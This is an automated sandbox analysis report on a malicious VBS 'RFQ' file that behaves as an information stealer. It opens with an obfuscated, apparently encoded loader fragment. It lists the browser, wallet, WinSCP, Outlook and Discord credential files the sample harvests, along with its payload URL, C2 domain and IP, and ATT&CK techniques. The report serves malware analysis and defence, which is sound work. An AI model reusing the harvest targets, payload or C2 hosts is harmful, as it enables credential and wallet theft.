zgbiahyaiaapadsajabsagiabqb3aguaiaa9acaatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4asqbpac4atqblag0abwbyahkauwb0ahiazqbhag0aowakafoaawbuagoabwbraheazqagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbjae8algbdag8abqbwahiazqbzahmaaqbvag4algbhahoaaqbwafmadabyaguayqbtacaajabgahgazwbqageadabiahkaywbiacwaiaaoafsasqbpac4aqwbvag0acabyaguacwbzagkabwbuac4aqwbvag0acabyaguacwbzagkabwbuae0abwbkaguaxqa6adoarablagmabwbtahaacgblahmacwapadsajabaagsabgbqag8aawbxagualgbdag8acab5afqabwaoacaajabsagiabqb3aguaiaapadsajabaagsabgbqag8aawbxagualgbdagwabwbzaguakaapadsajabgahgazwbqageadabiahkaywbiac4aqwbsag8acwblacgakqa7afsaygb5ahqazqbbaf0axqagacqauqb5ahkaaqb0ahqadwbmagiadgagad0aiaakafiaygbtahcazqauafqabwbbahiacgbhahkakaapadsawwbbahiacgbhahkaxqa6adoaugblahyazqbyahmazqaoacqauqb5ahkaaqb0ahqadwbmagiadgapadsaiaakaeoaegbragwacgbvahmaiaa9acaawwbtahkacwb0aguabqauaeeacabwaeqabwbtageaaqbuaf0aoga6aemadqbyahiazqbuahqarabvag0ayqbpag4algbmag8ayqbkacgajabrahkaeqbpahqadab3agyaygb2ackaowagacqauqbtahiazwbjagqazqbqacaapqagacqasgb6agsababyag8acwauaeuabgb0ahiaeqbqag8aaqbuahqaowagafsauwb5ahmadablag0algbeaguabablagcayqb0aguaxqa6adoaqwbyaguayqb0aguarablagwazqbnageadablacgawwbbagmadabpag8abgbdacwaiaakafeabqbyagcaywbkaguaagauaeqazqbjagwayqbyagkabgbnafqaeqbwagualaagacqauqbtahiazwbjagqazqbqac4atgbhag0azqapac4arab5ag4ayqbtagkaywbjag4adgbvagsazqaoackaiab8acaatwb1ahqalqboahuababsaa==			Jump to behavior

Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected Discord Token Stealer

Source: Yara match

File source: Process Memory Space: InstallUtil.exe PID: 8184, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002624000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Electrumk
Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002624000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ElectronCash
Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002624000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Jaxx Liberty!
Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002947000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $^q3C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002624000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ElectrumLTC
Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002947000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $^q0C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002624000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Exodus
Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002947000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $^q<C:\Users\user\AppData\Roaming\Binance\Local Storage\leveldb
Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002624000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002947000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: `,^q5C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2042987541.0000000009650000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: set_UseMachineKeyStore

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior

Source: Yara match	File source: 00000008.00000002.2063750110.0000000002624000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2063750110.000000000282E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 8184, type: MEMORYSTR

Remote Access Functionality

Yara detected Discord Token Stealer

Source: Yara match

File source: Process Memory Space: InstallUtil.exe PID: 8184, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	21 Scripting	Valid Accounts	141 Windows Management Instrumentation	21 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	211 Process Injection	3 Obfuscated Files or Information	1 Credentials in Registry	34 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	1 DLL Side-Loading	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Masquerading	NTDS	131 Security Software Discovery	Distributed Component Object Model	1 Clipboard Data	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	51 Virtualization/Sandbox Evasion	LSA Secrets	1 Process Discovery	SSH	Keylogging	113 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	211 Process Injection	Cached Domain Credentials	51 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
RFQ_43200046412000086500125.vbs	8%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	0%	ReversingLabs

Source	Detection	Scanner	Label	Link
https://cud-senegal.org	0%	Avira URL Cloud	safe
https://cud-senegal.org/post-postlogin/Agfdatq.mp4	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
cud-senegal.org	51.159.14.89	true	false	high
coloscolorado.duckdns.org	194.226.169.227	true	true	unknown
35.37.15.0.in-addr.arpa	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://cud-senegal.org/post-postlogin/Agfdatq.mp4	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://aka.ms/Vh5j3ku	wscript.exe, 00000000.00000003.1752480716.0000026411A5D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1766974031.0000026411A5D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2t	InstallUtil.exe, 00000008.00000002.2063750110.0000000002ADC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.000000000630D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/14436606/23354	RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2011025718.0000000005606000.00000004.00000800.00020000.00000000.sdmp, RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2045039920.0000000009990000.00000004.08000000.00040000.00000000.sdmp, RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.0000000006DFD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2063750110.0000000002541000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-netJ	RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2045039920.0000000009990000.00000004.08000000.00040000.00000000.sdmp, RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.0000000006DFD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2071800372.000000000364C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2011025718.00000000053F2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2011025718.00000000053F2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.000000000630D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://discordapp.com/api/v9/users/	InstallUtil.exe, 00000008.00000002.2063750110.000000000282E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.000000000630D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-net	RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2045039920.0000000009990000.00000004.08000000.00040000.00000000.sdmp, RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.0000000006DFD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	InstallUtil.exe, 00000008.00000002.2085803769.0000000007B71000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2085803769.0000000008EF8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2063750110.0000000002761000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2071800372.00000000036E6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2085410253.00000000069F1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2063750110.0000000002A84000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	InstallUtil.exe, 00000008.00000002.2087150967.0000000009E71000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2085803769.0000000007B71000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2085803769.0000000008EF8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2063750110.0000000002ADC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2063750110.0000000002761000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2071800372.00000000036E6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2085410253.00000000069F1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2063750110.0000000002A84000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	InstallUtil.exe, 00000008.00000002.2063750110.0000000002761000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2011025718.00000000053F2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefox	InstallUtil.exe, 00000008.00000002.2063750110.0000000002761000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/odirm	wscript.exe, 00000000.00000003.1752480716.0000026411A5D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1766974031.0000026411A5D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17$=	InstallUtil.exe, 00000008.00000002.2063750110.0000000002624000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-neti	RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2045039920.0000000009990000.00000004.08000000.00040000.00000000.sdmp, RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.0000000006DFD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lB	RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2011025718.00000000052A1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/11564914/23354;	RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2045039920.0000000009990000.00000004.08000000.00040000.00000000.sdmp, RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.0000000006DFD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/2152978/23354	RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2045039920.0000000009990000.00000004.08000000.00040000.00000000.sdmp, RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.0000000006DFD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.000000000630D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://icanhazip.com/	InstallUtil.exe, 00000008.00000002.2063750110.0000000002624000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2063750110.000000000282E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.000000000630D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com/profiles/	InstallUtil.exe, 00000008.00000002.2063750110.0000000002624000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2063750110.000000000282E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id	InstallUtil.exe, 00000008.00000002.2063750110.0000000002A84000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016$=	InstallUtil.exe, 00000008.00000002.2063750110.0000000002624000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2011025718.00000000052A1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cud-senegal.org	RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2011025718.00000000053F2000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
194.226.169.227	coloscolorado.duckdns.org	Russian Federation		60837	PKTRU	true
51.159.14.89	cud-senegal.org	France		12876	OnlineSASFR	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1591736
Start date and time:	2025-01-15 11:37:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 12s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	RFQ_43200046412000086500125.vbs
Detection:	MAL
Classification:	mal100.bank.troj.spyw.evad.winVBS@8/5@3/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 92% Number of executed functions: 507 Number of non-executed functions: 42
Cookbook Comments:	Found application associated with file extension: .vbs Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
05:38:07	API Interceptor	41x Sleep call for process: RFQ_43200046412000086500125.vbs.exe modified
05:38:33	API Interceptor	33x Sleep call for process: InstallUtil.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
194.226.169.227	Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip	Get hash	malicious	Unknown	Browse
51.159.14.89	TiOWA908TP.exe	Get hash	malicious	Unknown	Browse
	TiOWA908TP.exe	Get hash	malicious	Unknown	Browse
	TiOWA908TP.exe	Get hash	malicious	Unknown	Browse
	TiOWA908TP.exe	Get hash	malicious	Unknown	Browse
	TiOWA908TP.exe	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
cud-senegal.org	TiOWA908TP.exe	Get hash	malicious	Unknown	Browse	51.159.14.89
	TiOWA908TP.exe	Get hash	malicious	Unknown	Browse	51.159.14.89
	TiOWA908TP.exe	Get hash	malicious	Unknown	Browse	51.159.14.89
	TiOWA908TP.exe	Get hash	malicious	Unknown	Browse	51.159.14.89
	TiOWA908TP.exe	Get hash	malicious	Unknown	Browse	51.159.14.89

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
PKTRU	Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip	Get hash	malicious	Unknown	Browse	194.226.169.227
OnlineSASFR	http://www.bordeaux-doc.com/ville_de_rochefort/Roch/LR/Boya-uk.htm	Get hash	malicious	Unknown	Browse	62.210.16.62
	tTbeoLWNhb.dll	Get hash	malicious	Wannacry	Browse	163.172.72.249
	sUlHfYQxNw.dll	Get hash	malicious	Wannacry	Browse	51.159.121.1
	TiOWA908TP.exe	Get hash	malicious	Unknown	Browse	51.159.14.89
	TiOWA908TP.exe	Get hash	malicious	Unknown	Browse	51.159.14.89
	TiOWA908TP.exe	Get hash	malicious	Unknown	Browse	51.159.14.89
	TiOWA908TP.exe	Get hash	malicious	Unknown	Browse	51.159.14.89
	TiOWA908TP.exe	Get hash	malicious	Unknown	Browse	51.159.14.89
	http://aeromorning.com	Get hash	malicious	Unknown	Browse	212.129.3.113
	12E56QE1Fc.exe	Get hash	malicious	Azorult	Browse	51.15.142.235

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	0969686.vbe	Get hash	malicious	AgentTesla	Browse	51.159.14.89
	Inquiry.js	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	51.159.14.89
	17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	51.159.14.89
